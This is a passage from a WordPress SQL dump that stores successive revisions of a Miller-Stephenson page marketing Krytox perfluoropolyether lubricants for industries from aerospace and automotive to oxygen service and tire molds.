<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:56:44', '2016-09-28 17:56:44', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2102, 2, '2016-09-28 17:56:57', '2016-09-28 17:56:57', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:56:57', '2016-09-28 17:56:57', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2103, 2, '2016-09-28 18:03:03', '2016-09-28 18:03:03', '<p>&nbsp;</p>\n[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<A HREF=#bearings>BEARINGS</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span__sm="12"]\n\n\n[/col]\n[col span__sm="12"]\n\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\n<p><strong>Pick your Industry</strong></p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<p><strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong></p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p><strong>Box Board Corrugating</strong></p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p><strong>Food Processing</strong></p>\n<p><strong>Medical Industry Equipment Applications</strong></p>\n<p><strong>Metal Processing</strong></p>\n<p><strong>Oxygen and Reactive Gas Service</strong></p>\n<p><strong>Power Generation</strong></p>\n<p><strong>Pulp and Paper</strong></p>\n<p><strong>Textile</strong></p>\n<p><strong>Tire Mold</strong></p>\n<p>&nbsp;</p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n<p><strong>Chemical and 